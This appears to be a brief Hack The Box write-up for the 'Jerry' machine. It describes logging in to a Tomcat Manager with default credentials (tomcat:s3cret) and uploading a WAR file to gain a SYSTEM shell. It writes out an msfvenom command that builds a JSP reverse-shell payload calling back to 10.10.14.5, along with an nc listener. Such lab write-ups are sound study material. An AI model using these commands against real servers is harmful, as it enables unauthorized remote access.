Hackthebox - Jerry

  • Windows

Devel

Nmap

We only have one port open

Port 8080

tomcat
  • In the meantime we can try to log in on Manager. admin password or admin:admin does not work.

  • We get redirect here so I tried tomcat with a password of s3cret and it works

Access denied
  • We can now try to upload things here

Upload
  • Let's make a malicious war file with msfvenom and upload it msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f war > shell.war

  • rlwrap nc -lvp 1234 we set up a listener

  • We upload it and deploy it. We can see it here

  • We get a shell as authority system right away

  • If we go to the Administrator's Desktop we have the user and the root flag in the same file

2 flags
  • And we are done. Shortest writeup ever I think 😆 😆

Last updated